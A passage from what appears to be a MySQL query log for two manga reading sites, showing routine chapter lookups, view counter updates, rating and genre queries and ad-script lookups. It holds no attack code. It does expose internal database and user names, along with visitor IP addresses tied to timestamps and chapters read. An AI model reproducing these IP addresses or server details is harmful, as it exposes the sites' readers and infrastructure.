as average_rating FROM ratings where manga_id = '376' order by created desc 330661820 Quit 330661821 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661821 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '381' order by created desc 330661821 Quit 330661822 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661822 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '346' order by created desc 330661822 Quit 330661823 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661823 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '309' order by created desc 330661823 Quit 330661824 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661824 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '316' order by created desc 330661824 Quit 330661825 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661825 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '384' order by created desc 330661825 Quit 330661826 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661826 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '291' order by created desc 330661826 Quit 330661827 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661827 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '359' order by created desc 330661827 Quit 330661828 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661828 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '377' order by created desc 330661828 Quit 330661829 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661829 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '378' order by created desc 330661829 Quit 330661830 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661830 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '282' order by created desc 330661830 Quit 330661831 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661831 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '345' order by created desc 330661831 Quit 330661832 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661832 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330661832 Quit 330661833 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661833 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '360' order by created desc 330661833 Quit 330661834 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661834 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '383' order by created desc 330661834 Quit 330661835 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661835 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '375' order by created desc 330661835 Quit 330661836 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661836 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '305' order by created desc 330661836 Quit 330661837 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661837 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '385' order by created desc 330661837 Quit 330661838 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661838 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '369' order by created desc 330661838 Quit 330661839 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661839 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '387' order by created desc 330661839 Quit 330661840 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661840 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '362' order by created desc 330661840 Quit 330661841 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661841 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '388' order by created desc 330661841 Quit 330661842 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661842 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '364' order by created desc 330661842 Quit 330661843 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661843 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '389' order by created desc 330661843 Quit 330661844 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661844 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '365' order by created desc 330661844 Quit 330661845 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661845 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '379' order by created desc 330661845 Quit 330661846 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661846 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '370' order by created desc 330661846 Quit 330661847 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661847 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '390' order by created desc 330661847 Quit 330661848 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661849 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661848 Quit 330661849 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330661849 Quit 330661850 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661851 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661851 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '1362' and m.active = 1 330661850 Quit 330661852 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661852 Query select * FROM chapters where id = '1362' 330661851 Quit 330661852 Quit 330661853 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661853 Query select * FROM chapters where manga_id = '22' order by display_priority ASC, id desc 330661853 Quit 330661854 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661854 Query Update chapters set view=view+1 where id = '1362' 330661854 Quit 330661855 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661855 Query select * FROM chapters where id = '1362' 330661855 Quit 330661856 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661856 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '1362' and m.active = 1 330661856 Quit 330661857 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661857 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('22', '1362', '104.249.111.16', 'mangaberri.com', '2026-02-26 03:30:13', '2026-02-26 03:30:13') 330661857 Quit 330661858 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661858 Query select * FROM chapter_images where chapter_id = '1362' 330661858 Quit 330661859 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661859 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '22' and m.active = 1 330661859 Quit 330661860 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661860 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='22' and m.active = 1 AND (genres like '%Action%' OR genres like '%Demons%' OR genres like '%Drama%' OR genres like '%Magic%' OR genres like '%Martial Arts%' OR genres like '%School%' OR genres like '%Shounen%' OR genres like '%Super Power%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 330661860 Quit 330661861 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661862 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661862 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330661861 Quit 330661862 Quit 330661863 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661864 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661863 Quit 330661864 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330661864 Quit 330661865 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661866 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661866 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330661865 Quit 330661866 Quit 330661867 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661868 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661867 Quit 330661868 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330661868 Quit 330661163 Quit 330661869 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661870 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661869 Quit 330661870 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330661870 Quit 330661871 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661872 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661871 Quit 330661872 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330661872 Quit 330661873 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661874 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661873 Quit 330661874 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330661874 Quit 330661875 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661876 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661876 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330661875 Quit 330661876 Quit 260225 19:30:14 330661877 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661878 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661877 Quit 330661878 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '18101' 330661878 Quit 330661879 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661879 Query select * FROM chapters where id = '18101' 330661879 Quit 330661880 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661880 Query select * FROM chapters where manga_id = '197' order by id desc 330661880 Quit 330661881 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661881 Query Update chapters set view=view+1 where id = '18101' 330661881 Quit 330661882 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661882 Query select * FROM chapters where id = '18101' 330661882 Quit 330661883 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661883 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '18101' 330661883 Quit 330661884 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661884 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('197', '18101', '2803:1800:501a:ee1b:bc0e:9aff:fed1:1842', 'mangacherri.com', '2026-02-26 03:30:14', '2026-02-26 03:30:14') 330661884 Quit 330661885 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661885 Query select * FROM chapter_images where chapter_id = '18101' 330661885 Quit 330661886 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661886 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '197' and m.active = 1 330661886 Quit 330661887 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661887 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='197' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%Shoujo%') ORDER BY RAND() limit 10 330661888 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661889 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661888 Quit 330661889 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '3162' 330661889 Quit 330661890 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661890 Query select * FROM chapters where id = '3162' 330661890 Quit 330661891 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661891 Query select * FROM chapters where manga_id = '77' order by id desc 330661891 Quit 330661892 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661892 Query Update chapters set view=view+1 where id = '3162' 330661892 Quit 330661893 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661893 Query select * FROM chapters where id = '3162' 330661893 Quit 330661894 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661894 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '3162' 330661894 Quit 330661895 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661895 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('77', '3162', '102.214.84.34', 'mangacherri.com', '2026-02-26 03:30:14', '2026-02-26 03:30:14') 330661895 Quit 330661896 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661896 Query select * FROM chapter_images where chapter_id = '3162' 330661896 Quit 330661897 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661897 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '77' and m.active = 1 330661897 Quit 330661898 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661898 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='77' and m.active = 1 AND (genres like '%Romance%' OR genres like '%School%' OR genres like '%Shoujo%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 260225 19:30:15 330661887 Quit 330661899 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661900 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661900 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330661899 Quit 330661900 Quit 330661901 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661902 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661901 Quit 330661902 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330661902 Quit 330661903 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661904 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661903 Quit 330661904 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330661904 Quit 330661905 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661906 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661905 Quit 330661906 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330661906 Quit 330661898 Quit 330661907 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661908 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661907 Quit 330661908 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330661908 Quit 330661909 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661910 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661909 Quit 330661910 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330661910 Quit 330661911 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661912 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661911 Quit 330661912 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330661912 Quit 330661913 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661914 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661913 Quit 330661914 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330661914 Quit 330661915 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661916 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661916 Query SELECT COUNT(cv.id) AS total_view, m.*, lc.id AS latest_chapter_id, lc.name AS latest_chapter FROM chapter_views AS cv JOIN mangas AS m ON m.id = cv.manga_id LEFT JOIN ( SELECT c1.* FROM chapters c1 INNER JOIN ( SELECT manga_id, MAX(id) AS max_id FROM chapters GROUP BY manga_id ) c2 ON c1.manga_id = c2.manga_id AND c1.id = c2.max_id ) AS lc ON lc.manga_id = m.id WHERE m.active = 1 AND DATE(cv.created) >= CURDATE() - INTERVAL WEEKDAY(CURDATE()) DAY AND DATE(cv.created) < CURDATE() - INTERVAL WEEKDAY(CURDATE()) - 7 DAY GROUP BY m.id ORDER BY total_view DESC 330661915 Quit 330661917 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661918 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661917 Quit 330661918 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '18101' 330661918 Quit 330661919 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661919 Query select * FROM chapters where id = '18101' 330661919 Quit 330661920 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661920 Query select * FROM chapters where manga_id = '197' order by id desc 330661920 Quit 330661921 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661921 Query Update chapters set view=view+1 where id = '18101' 330661921 Quit 330661922 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661922 Query select * FROM chapters where id = '18101' 330661923 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661923 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '18101' 330661922 Quit 330661923 Quit 330661924 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661924 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('197', '18101', '27.147.176.117', 'mangacherri.com', '2026-02-26 03:30:15', '2026-02-26 03:30:15') 330661924 Quit 330661925 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661925 Query select * FROM chapter_images where chapter_id = '18101' 330661925 Quit 330661926 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661926 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '197' and m.active = 1 330661926 Quit 330661927 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661927 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='197' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%Shoujo%') ORDER BY RAND() limit 10 330661928 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661929 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661928 Quit 330661929 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '5113' and m.active = 1 330661929 Quit 330661930 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661930 Query select * FROM chapters where id = '5113' 330661930 Quit 330661931 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661931 Query select * FROM chapters where manga_id = '141' order by display_priority ASC, id desc 330661931 Quit 330661932 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661932 Query Update chapters set view=view+1 where id = '5113' 330661932 Quit 330661933 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661933 Query select * FROM chapters where id = '5113' 330661934 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661934 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '5113' and m.active = 1 330661933 Quit 330661934 Quit 330661935 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661935 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('141', '5113', '15.235.27.111', 'mangaberri.com', '2026-02-26 03:30:15', '2026-02-26 03:30:15') 330661935 Quit 330661936 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661936 Query select * FROM chapter_images where chapter_id = '5113' 330661936 Quit 330661937 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661937 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '141' and m.active = 1 330661937 Quit 330661938 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661938 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='141' and m.active = 1 AND (genres like '%Action%' OR genres like '%Adventure%' OR genres like '%Comedy%' OR genres like '%Drama%' OR genres like '%Fantasy%' OR genres like '%Martial Arts%' OR genres like '%Super Power%') ORDER BY RAND() limit 10 330661938 Quit 330661939 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661940 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661939 Quit 330661940 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330661940 Quit 330661941 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661942 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661941 Quit 330661942 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330661942 Quit 330661943 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661944 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661943 Quit 330661944 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330661944 Quit 330661945 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661946 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661945 Quit 330661946 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330661946 Quit 330661927 Quit 330661947 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661948 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661947 Quit 330661948 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330661948 Quit 330661949 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661950 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661950 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330661949 Quit 330661950 Quit 330661951 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661952 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661951 Quit 330661952 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330661952 Quit 330661953 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661954 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661953 Quit 330661954 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330661954 Quit 330661955 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661956 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661955 Quit 330661956 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '6651' 330661956 Quit 330661957 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661957 Query select * FROM chapters where id = '6651' 330661957 Quit 330661958 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661958 Query select * FROM chapters where manga_id = '127' order by id desc 330661958 Quit 330661959 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661959 Query Update chapters set view=view+1 where id = '6651' 330661959 Quit 330661960 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661960 Query select * FROM chapters where id = '6651' 330661960 Quit 330661961 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661961 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '6651' 330661961 Quit 330661962 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661962 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('127', '6651', '118.103.255.196', 'mangacherri.com', '2026-02-26 03:30:15', '2026-02-26 03:30:15') 330661962 Quit 330661963 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661963 Query select * FROM chapter_images where chapter_id = '6651' 330661963 Quit 330661964 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661964 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '127' and m.active = 1 330661964 Quit 330661965 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661965 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='127' and m.active = 1 AND (genres like '%Romance%' OR genres like '%School%' OR genres like '%Shoujo%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 330661966 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661967 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661966 Quit 330661967 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '24' and m.active = 1 330661967 Quit 330661968 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661968 Query select * FROM chapters where id = '24' 330661968 Quit 330661969 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661969 Query select * FROM chapters where manga_id = '20' order by display_priority ASC, id desc 330661969 Quit 330661970 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661970 Query Update chapters set view=view+1 where id = '24' 330661970 Quit 330661971 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661971 Query select * FROM chapters where id = '24' 330661971 Quit 330661972 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661972 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '24' and m.active = 1 330661972 Quit 330661973 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661973 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('20', '24', '198.237.34.3', 'mangaberri.com', '2026-02-26 03:30:15', '2026-02-26 03:30:15') 330661973 Quit 330661974 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661974 Query select * FROM chapter_images where chapter_id = '24' 330661974 Quit 330661975 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661975 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '20' and m.active = 1 330661975 Quit 330661976 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661976 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as 